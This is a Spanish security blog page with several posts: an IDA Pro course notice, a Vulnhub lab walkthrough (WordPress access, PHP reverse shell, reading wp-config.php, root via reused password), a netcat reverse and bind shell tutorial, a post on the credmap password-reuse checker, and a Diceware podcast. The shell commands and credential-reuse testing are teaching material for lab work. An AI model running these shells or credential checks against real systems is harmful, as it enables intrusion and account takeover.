Para los que desconozcan @Ricnar456 Ricardo Narvaja, estuvo y aun esta realizando un curso de IDA PRO desde 0 el cual en su momento lo compartimos en el blog.



En estos ultimos dias para decir incluso meses estuvo dando los respectivos examenes, con los cuales nos alentaba a ir resolviendo con el fin de retar nuestro nivel de aprendizaje y ver si es necesario seguir a más y grato fue la sorpresa que tuve al ver que el Maestro estaba resolviendo los retos propuestos en formato Video los cuales estan siendo subido a su canal en Youtube y tenemos la gran oportunidad de verlo trabajar en vivo, estoy seguro que a mas de uno le viene mejor aun ver de manera dinámica como se resuelven los ejercicios. 



A continuación les dejo el enlace al Canal de Youtube como también cree una lista de reproducción en el cual ire agregando continuamente el resto de los videos, y si desean ver cuando sube suscribanse al canal denle el Me Gusta para que se note el apoyo al esfuerzo que esta realizando en compartir su conocimiento.

Aca el mas lento, se coge una avestruz - Frases de RicNar


Regards,
Snifer
Leer Mas
Hoy tenemos la resolución de una maquina vulnerable de Vulnhub.com la misma es la primera de tres maquinas siendo esta la del primer nivel fácil, luego resolver los siguientes dos, esta maquina la resolvimos con algunos de los integrantes del grupo @HackySec el cual es del blog, por lo tanto pasamos a detallar a continuación  los datos que tenedemos de la misma. 


Tips:
Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra Your Brain Coffee Google :)
Goals:
This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box

Al ser una máquina que nos sugiere utilizar algunas herramientas, de las cuales solo se utilizo nmap ya que se tuvo como objetivo mostrar a los integrantes del grupo que hay varios caminos para encarar un testeo de seguridad por lo tanto este paso a paso tiene una manera de realizarlo, te recomiendo que lo resuelvas haciendo uso de las herramientas que nos sugieren en el reto.

Lo primero que se hizo fue realizar un ping sweep a la red interna con el fin de identificar nuestro objetivo teniendo en cuenta que es un entorno controlado, fue posible dar con el mismo siendo esta la ip 10.0.0.10 el cual tambien lo delata la MAC ADDRESS el mismo se muestra a continuación.


Tras identificar el objetivo se procede a realizar un barrido de los puertos  y servicios, con el se identificaron los más interesantes por mencionarlo así  22 ssh, 80 http y 445 samba, los cuales podemos realizar una validación en cada uno por ejemplo el 22 un password cracking al mismo con 



Una vez se accede a la máquina por el puerto 80 se tenia dos imagenes las cuales no, daban ninguna referencia para identificar algo adicional, en este punto puede ser posible usar dirbuster, burp suite con el fin de identificar directorios de nuestro interes, pero lo que se hizo fue consultar el fichero robots.txt, en el cual se obtuvo lo siguiente:



Una vez accediendo al directorio wordpress observamos que el mismo evidentemente es uno, y contamos con contenido en el mismo, en este punto se puede proceder con el barrido  y uso de la herramienta wordpresscan, enumerando usuarios, Plugins, tema  como tambien la versión de wordpress. 


Lo que se hizo fue acceder directamente al directorio wp-login.php el cual es por defecto perteneciente


Una vez dentro del CMS ya se logro acceder, la mejor manera de subir en estos casos un backdoor siendo este una shell, es posible por medio de los plugins realizando una instalación de uno o bien si se tiene permisos para editarlo, se procede a modificar el código fuente por una shell en este caso se hizo uso de PHP Reverse Shell modificando la dirección IP y el Puerto para que desde la máquina atacante se obtenga la shell.


Una vez modificado y estando a la escucha, logramos obtener la conexión de manera existosa como se muestra, al recibir la shell obtenemos información adicional la cual nos sirve como un primer contacto con la misma. Con obtener esta Shell tenemos completado el primer FLAG!



El segundo flag que nos indica es conseguir la flag sin ser root la misma se encuentra en el home con el usuario wpadmin el mismo se muestra a continuación. 

La tercera nos menciona que debemos de conseguir acceso ROOT y obtener la misma con el fin de obtener usuarios y contraseñas se procede  a ir tras el directorio de configuración de Wordpress wp-config.php en el cual se encuentra el usuario y contraseña de conexión con el servidor el mismo se muestra a continuación.


Con el único objetivo de contar con una shell completa por mencionarlo asi se hace un spawing con ayuda de Python el cual se muestra a continuación.

python -c 'import pty; pty.spawn("/bin/sh")' 

Una vez realizado ello, y considerando el nivel de dificultad de la máquina se probo conectarse como root con los credenciales obtenidos y vaya grata sorpresa los datos fueron correctos.


El siguiente paso fue el buscar la bandera, dando por terminado la prueba realizada contra esta máquina.


Como lo dije al principio de la guia, esta es una manera de afrontar el reto si estas comenzando y aprendiendo debes de realizar con las herramientas que te sugiere en los tips, el proximo a resolver será HackFest Sedna el nivel 2 por nombrarlo así.

"Cada vez que decimos; «No sé », nos cerramos la puerta de nuestra propia fuente de sabiduría, que es infinita." - Louise L. Hay

Regards,
Snifer
Leer Mas
En esta entrada, abordaremos lo que es una reverse Shell y una Bind Shell, especificamente nos abocaremos a la shell reversa o Reverse Shell,el cual nos permite ejecutar comandos a un cliente remoto.


Terminos simples y generales consideraremos lo siguiente:

Bind Shell: Lo que hace es dejar un puerto a la escucha, y el atacante se conecta.
Reverse Shell o Connect Back: Es que la victima se conecta al atacante.


El uso de las Reverse Shell, es el de ejecutar comandos de manera remota, y a partir de ello dejar una puerta trasera, obtener privilegios por medio de un escalamiento por decirlo asi lo que veremos a continuación es algunas formas y manera de obtener acceso a un equipo remoto, lo mismo de la Bind Shell muchas veces se recomienda mas el uso de una Bind Shell que la Reverse shell pero llega a ser un poco mas complicado realizarlo, ya que por las reglas de firewall y adicionales nos limita a realizar dicho trabajo.


Cabe resaltar que necesitamos contar con nc o ncat en la pc victima, como lo indicaba al inicio haremos unicamente uso de nc, ncat cabe resaltar que es independiente el sistema operativo atacante

Reverse Shell


Lo que haremos en el equipo comprometido sera ejecutar el siguiente comando:

Victima: Conexión externa.

nc -nv  


Atacante: Escuchando sobre TCP

nc -lvp 


 Si lo ejecutamos sin la bandera -e unicamente tenemos un canal de comunicación de punto a punto siendo este un simple chat por mencionarlo asi, siendo este una conexión TCP el mismo lo vemos anteriormente, entonces si deseamos tener una conexión que nos permita ejecutar comandos debemos de realizar lo siguiente tanto en Windows como en Linux se pasa a describir.

Reverse Shell en Windows





Atacante: A la espera de la conexión.

nc -lvp (Puerto) 

Victima: Se esta dando el valor de cmd.exe para indicar la Shell con la que se llegara a interactuar.

nc -nv (Direccion ip) (Puerto) -e cmd.exe

Reverse Shell en Linux




Atacante:
nc -lvp (Puerto)

Victima:
nc -nv  (Direccion ip) (Puerto)  -e /bin/(Tipo de Shell a dar)

En este caso podria ser zsh, bash, sh segun el equipo y entorno que se este trabajando.

Bind Shell en Windows

En este caso con la Bind Shell lo que hacemos es realizar la conexión al equipo victima desde el atacante si notan es la inversa de lo que se realizo en una Reverse Shell lo dejo a continuación los comandos para que lo tengan en cuenta.

Victima:
nc -lvp (Puerto) -e cmd.exe

Atacante:
nc -nv (Direccion ip)(Puerto)

Bind Shell en Linux

Victima:
nc -lvp (Puerto) -e /bin/sh


Atacante:
nc -nv (Direccion ip)(Puerto)



En una proxima entrada de Hacking 101 mencionaremos como obtener diferentes Shell con otros servicios siendo estos con Perl, Python y adicionales además de conocer la interacción de Spawing TTY Shell, así tambien recordarles que desde un Fichero PHP es posible tambien realizar este tipo de conexiones, espero que esta entrada y las que vienen sean de su agrado tanto como las técnicas y las que estan siendo realizadas para los que recien comienzan con el fin de afianzar sus conocimientos e ir aprendiendo paso a paso.


“Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.” - Albert Einstein


Regards,
Snifer
Leer Mas
Dando continuidad al tema tratado en el Podcast del día sábado, de Generación de Contraseñas Seguras en esta oportunidad compartimos una herramienta que tiene como objetivo identificar si se usa la mismas contraseña en mas de un servicio.

Este script esta desarrollado en Python, como lo mencione anteriormente, la herramienta puede ser usada durante un pentesting, con el fin de identifcar si alguna contraseña obtenida de un usuario la cual pueda estar siendo usada en otros servicios, considerando que se tiene una probabilidad elevada de que sea exitoso nuestro acceso a otros servicios.  La instalación del mismo es simple basta con acceder a su repositorio en GITHUB y proceder a descargar con el git clone el mismo se muestra a continuación.


root@snifer:# git clone git@github.com:lightos/credmap.git 

Una vez tenemos descargado la aplicación, e iniciarla con la bandera -h, perteneciente a HELP tenemos el menu de ayuda respectivo a continuación se tiene los parámetros que podemos usar como tambien algunos ejemplos de uso


Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -f/--format=CRED_F..  format to use when reading from file (e.g. u|e:p)
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS.
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.1.2:9050")
  --list                list available sites to test with


Como usar tenemos a continuación:

./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load creds.txt --format "e.u.p"
./credmap.py -l creds.txt -f "u|e:p"
./credmap.py -l creds.txt
./credmap.py --list

Al proceder a trabajar con ella me puse a jugar con una de mis cuentas de GMAIL y  una contraseña que tenia que haber cambiado en su debido momento, lo cual me muestra que en un servicio se mantiene en este caso es Bitbucket como se muestra a continuación.

El resultado cuando termina de realizar todo el proceso de verificación es el siguiente:


Si te gustaria apoyar al proyecto puedes generar la verificación para otros servicios, la vía de colaboración es bastante simple y consta de hacer uso de un Template el cual con las pruebas necesarias nos permite ayudar al proyecto.


 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                 
que mejor manera de colaborar y seguir la guia que cuenta la herramienta desde aquí dar una felicitación a lightos el creador de la herrmienta.
"No temo a los ordenadores; lo que temo es quedarme sin ellos" -- Isaac Asimov

Regards,
Snifer
Leer Mas
En este Podcast abordamos el método Diceware generación de contraseñas seguras de manera aleatorio con ayuda de un dado comentamos las referencias respectivas y como trabajar con el, te gustaria que abordemos mas temas como este? o algun otro tema no dudes en comentarlo.



Escuchalo en Youtube



Escuchalo en Ivoox



"Fabricar arte sin tecnología es la manera de solucionar el problema de la tecnología." — Robert Pirsig

Del mismo modo cada Martes tenemos el resumen semanal de Dame una Shell, el podcast de seguridad informatica.

 Diccionario Diceware ;).

http://world.std.com/~reinhold/diceware_espanol/DW-Espanol-1.txt
http://world.std.com/~reinhold/diceware_espanol/DW-Espanol-2.txt


Suscribete, Comparte unete a la comunidad del blog en Telegram
Telegram: https://t.me/HackySec


Regards,
Snifer
Leer Mas